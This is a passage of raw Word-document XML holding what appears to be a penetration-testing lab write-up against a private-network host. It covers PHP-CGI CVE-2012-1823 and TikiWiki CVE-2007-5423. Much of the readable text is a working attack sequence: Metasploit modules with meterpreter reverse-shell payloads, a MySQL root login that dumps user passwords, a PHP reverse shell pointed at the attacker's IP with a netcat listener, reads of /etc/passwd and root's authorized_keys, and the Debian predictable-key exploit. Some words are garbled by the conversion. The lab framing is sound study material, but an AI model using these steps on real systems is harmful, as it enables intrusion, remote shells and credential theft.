                  <v:imagedata r:id="rId46" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1439" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:57393;top:31181;width:519;height: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">
                  <v:imagedata r:id="rId47" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 1440" o:spid="_x0000_s1029" style="position:absolute;left:57424;top:31565;width:466;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508188F3" w14:textId="77777777" w:rsidR="002B73F5" w:rsidRDefault="002B73F5" w:rsidP="002B73F5">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1441" o:spid="_x0000_s1030" style="position:absolute;left:57774;top:31485;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D94D0C5" w14:textId="77777777" w:rsidR="002B73F5" w:rsidRDefault="002B73F5" w:rsidP="002B73F5">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1443" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:57759;top:31120;width:488;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">
                  <v:imagedata r:id="rId48" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 1444" o:spid="_x0000_s1032" style="position:absolute;left:57774;top:31489;width:467;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4A463C9" w14:textId="77777777" w:rsidR="002B73F5" w:rsidRDefault="002B73F5" w:rsidP="002B73F5">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1445" o:spid="_x0000_s1033" style="position:absolute;left:58125;top:31409;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336D6589" w14:textId="77777777" w:rsidR="002B73F5" w:rsidRDefault="002B73F5" w:rsidP="002B73F5">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1447" o:spid="_x0000_s1034" type="#_x0000_t75" style="position:absolute;left:60;width:57364;height:31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">
                  <v:imagedata r:id="rId49" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1449" o:spid="_x0000_s1035" type="#_x0000_t75" style="position:absolute;left:60;top:33040;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">
                  <v:imagedata r:id="rId50" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1451" o:spid="_x0000_s1036" type="#_x0000_t75" style="position:absolute;left:60;top:46512;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">
                  <v:imagedata r:id="rId51" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1453" o:spid="_x0000_s1037" type="#_x0000_t75" style="position:absolute;left:60;top:59984;width:66508;height:13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">
                  <v:imagedata r:id="rId52" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1455" o:spid="_x0000_s1038" type="#_x0000_t75" style="position:absolute;top:73395;width:66415;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">
                  <v:imagedata r:id="rId53" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D80D9B">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A6C48" w14:textId="77777777" w:rsidR="008B708C" w:rsidRDefault="008B708C" w:rsidP="008B708C"/>
    <w:p w14:paraId="4A3061A1" w14:textId="08A9A82B" w:rsidR="004B637A" w:rsidRDefault="008B708C" w:rsidP="008B708C">
      <w:r>
        <w:t>Remote Code Execu</w:t>
      </w:r>
      <w:r w:rsidR="004B637A">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on - CVE-2012-1823 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA26742" w14:textId="77777777" w:rsidR="002119E7" w:rsidRDefault="002119E7" w:rsidP="008B708C"/>
    <w:p w14:paraId="2CC5192B" w14:textId="59130840" w:rsidR="008B708C" w:rsidRDefault="004B637A" w:rsidP="008B708C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidR="008B708C">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B0A4A" w14:textId="4327F64E" w:rsidR="002B73F5" w:rsidRDefault="008B708C" w:rsidP="008B708C">
      <w:r>
        <w:t>Some PHP versions, when configured to run using CGI, do not correctly handle query strings that lack an unescaped "=" character, enabling arbitrary code execu</w:t>
      </w:r>
      <w:r w:rsidR="008B6AC2">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on. In this case, an opera ng system command was caused to be executed on the web server, and the results were returned to the web browser.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D745CF5" w14:textId="225E78E3" w:rsidR="00A52060" w:rsidRDefault="0089054D" w:rsidP="008B708C">
      <w:r w:rsidRPr="0089054D">
        <w:t xml:space="preserve">Let’s use </w:t>
      </w:r>
      <w:r w:rsidR="00531359">
        <w:t>Metasploite</w:t>
      </w:r>
      <w:r w:rsidRPr="0089054D">
        <w:t xml:space="preserve"> to see if </w:t>
      </w:r>
      <w:r w:rsidR="00531359">
        <w:t>Zap</w:t>
      </w:r>
      <w:r w:rsidRPr="0089054D">
        <w:t xml:space="preserve"> was correct. use exploit/mul</w:t>
      </w:r>
      <w:r w:rsidR="002678B2">
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidR="002678B2" w:rsidRPr="002678B2">
        <w:t>/h</w:t>
      </w:r>
      <w:r w:rsidR="00A52060">
        <w:t>tt</w:t>
      </w:r>
      <w:r w:rsidR="002678B2" w:rsidRPr="002678B2">
        <w:t>p/php_cgi_arg_injec</w:t>
      </w:r>
      <w:r w:rsidR="008B6AC2">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00A52060">
        <w:t>ion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD485E0" w14:textId="7E8F801F" w:rsidR="002B73F5" w:rsidRDefault="00A52060" w:rsidP="00E17435">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="786B2313" wp14:editId="7DFA189F">
            <wp:extent cx="5736590" cy="4328795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="683901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6590" cy="4328795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F6E17" w14:textId="77777777" w:rsidR="001734D6" w:rsidRDefault="001734D6" w:rsidP="001734D6">
      <w:r>
        <w:t xml:space="preserve">set RHOSTS 192.168.254.186 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADC2DCA" w14:textId="5F980C10" w:rsidR="001734D6" w:rsidRDefault="001734D6" w:rsidP="001734D6">
      <w:r>
        <w:t>payload op ons (php/meterpreter/reverse_tcp) where already set from another test</w:t>
      </w:r>
      <w:r w:rsidR="008B6AC2">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if not</w:t>
      </w:r>
      <w:r w:rsidR="008B6AC2">
        <w:t xml:space="preserve"> you need to set the </w:t>
      </w:r>
      <w:r w:rsidR="00AA7712">
        <w:t>LPORT.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79916172" w14:textId="77777777" w:rsidR="00AA7712" w:rsidRDefault="001734D6" w:rsidP="001734D6">
      <w:r>
        <w:t xml:space="preserve">set LPORT 4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4B39E" w14:textId="3172D1E5" w:rsidR="001734D6" w:rsidRDefault="001734D6" w:rsidP="001734D6">
      <w:r>
        <w:t xml:space="preserve">set  LHOST 192.168.254.182 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552E6EC3" w14:textId="2CA46A69" w:rsidR="009F2B48" w:rsidRDefault="009F2B48" w:rsidP="009F2B48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054FBDEB" wp14:editId="26B5EF27">
            <wp:extent cx="5736590" cy="3938270"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1017406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590" cy="3938270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E975DA1" w14:textId="16463FA7" w:rsidR="006677D6" w:rsidRDefault="006677D6" w:rsidP="006677D6">
      <w:r>
        <w:t>Enter shell at the prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFB1CC" w14:textId="16F0B24E" w:rsidR="006677D6" w:rsidRDefault="006677D6" w:rsidP="006677D6">
      <w:r>
        <w:t xml:space="preserve">With root being the owner, a compromised web server would have access to your entire system. By specifying a specific ID a compromised web server would only have full access to its files and not the entire server.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445EAF7" w14:textId="097A5F9F" w:rsidR="00F54D0B" w:rsidRDefault="006677D6" w:rsidP="006677D6">
      <w:r>
        <w:t xml:space="preserve">I was able to run system </w:t>
      </w:r>
      <w:r w:rsidR="00405ED6">
        <w:t>commands.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258AAD7" w14:textId="116A0A3F" w:rsidR="009F2B48" w:rsidRDefault="00F54D0B" w:rsidP="009F2B48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="521449F3" wp14:editId="156CFE72">
            <wp:extent cx="5736590" cy="2097405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15501934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6590" cy="2097405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9A5EC7" w14:textId="4807A51C" w:rsidR="007D2B9F" w:rsidRDefault="00433EE2" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">Was able to move around the Filing system but as you see I could get to the authorized_keys file for root.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5B08E" w14:textId="77777777" w:rsidR="004872DF" w:rsidRDefault="004872DF" w:rsidP="007D2B9F"/>
    <w:p w14:paraId="5BE43D73" w14:textId="77777777" w:rsidR="004872DF" w:rsidRDefault="004872DF" w:rsidP="007D2B9F"/>
    <w:p w14:paraId="25297287" w14:textId="203335FC" w:rsidR="00545F98" w:rsidRDefault="00545F98" w:rsidP="00545F98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc155092366"/>
      <w:r w:rsidRPr="00545F98">
        <w:lastRenderedPageBreak/>
        <w:t>tikiwiki_graph_formula_exec</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="61E428A6" w14:textId="200CA87D" w:rsidR="004872DF" w:rsidRDefault="004872DF" w:rsidP="004872DF">
      <w:r>
        <w:t>List of CVEs: CVE-2007-5423</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A585BA" w14:textId="08F86058" w:rsidR="004872DF" w:rsidRPr="004872DF" w:rsidRDefault="004872DF" w:rsidP="004872DF">
      <w:r>
        <w:t>TikiWiki (&lt;= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E8A2C" w14:textId="754FD34F" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t>192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75176EBB" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cd /pentest/web/dirbuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFFF758" w14:textId="05B14510" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>java -jar DirBuster-0.12.jar -u http://</w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve"> 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0A4BD" w14:textId="22FDCD2C" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve">192.168.254.186 </w:t>
      </w:r>
      <w:r>
        <w:t>/tikiwiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CC238" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33DD32" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>search tikiwiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9B4DC" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>use use admin/tikiwiki/tikidblib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C32C4" w14:textId="02B08FAD" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">setg RHOST </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t>192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151450B0" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47682E5A" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>firefox -&gt; www.exploit-db.com -&gt; TikiWiki (2701).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C7184D" w14:textId="09470708" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve">192.168.254.186 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/tikiwiki/ -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve">192.168.254.186 </w:t>
      </w:r>
      <w:r>
        <w:t>/tikiwiki/tiki</w:t>
      </w:r>
      <w:r w:rsidR="0086149A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>listpages.php?offset=0&amp;sort_mode=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC0124" w14:textId="416E3AC7" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>mysql -h 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00084769">
        <w:t>254</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00084769">
        <w:t>86</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C47A47" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93C91D" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>use tikiwiki195;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9736C6" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D3096" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>select * from users_users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD9820" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>select login, password from users_users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221CEDB" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609691F" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212A1A1" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>[new passowrd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF6F62" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>php reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0F0E6" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>php-reverse-shell.php -&gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716FAC0" w14:textId="021139F6" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>shell.php -&gt; Replace: 127.0.0.1 with 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="005E0814">
        <w:t>24.186</w:t>
      </w:r>
      <w:r>
        <w:t>]. Replace: 1234 with 4321.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E592B" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>nc -v -l -p 4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF69B0" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10165F14" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A4973" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF089AF" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>search tikiwiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDECE4D" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>use exploit/unix/webapp/tikiwiki_graph_formula_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D1DA4" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386E2DC" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B9FA4C" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>setg payload generic/shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C4106D" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6DEC4" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CF5BF" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC8A7C" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1998AE" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0318B0" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>ls -lart /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6EABD" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>ls -lart /root/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7FD1F" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cat /root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B66B66" w14:textId="2C6A5437" w:rsidR="00CE3F82" w:rsidRDefault="00137E89" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">I tried an alternative script </w:t>
      </w:r>
      <w:r w:rsidR="00CE3F82">
        <w:t xml:space="preserve">Debian OpenSSL Predictable (5720) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and I used the </w:t>
      </w:r>
      <w:r w:rsidR="00CE3F82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA2FF3">
        <w:t>the script downloaded for ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED411E6" w14:textId="10321507" w:rsidR="00AA2FF3" w:rsidRDefault="00AA2FF3" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">use the keys </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0265A706" w14:textId="4DAC6F9F" w:rsidR="00A30562" w:rsidRDefault="00A30562" w:rsidP="00CE3F82">
      <w:r>
        <w:t>Fix the script before you run it!</w:t>
      </w:r>
      <w:r w:rsidR="00492F17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53EB0E" w14:textId="23294D61" w:rsidR="003A36CC" w:rsidRDefault="003A36CC" w:rsidP="00CE3F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028A3E7C" wp14:editId="57FEA789">
            <wp:extent cx="5731510" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="9670766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76644" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3102610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5DE414" w14:textId="42AF7BE1" w:rsidR="00A30562" w:rsidRDefault="00684BC6" w:rsidP="00CE3F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61304F7D" wp14:editId="238473C4">
            <wp:extent cx="5731510" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="16607334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33458" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3102610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="312EB7D1" w14:textId="7836A8AC" w:rsidR="00684BC6" w:rsidRDefault="008121E5" w:rsidP="00CE3F82">
      <w:r w:rsidRPr="008121E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F1D102" wp14:editId="7A3208BD">
            <wp:extent cx="5731510" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="4220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9744" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3102610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1367AE7B" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cd rsa/2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D5D08" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
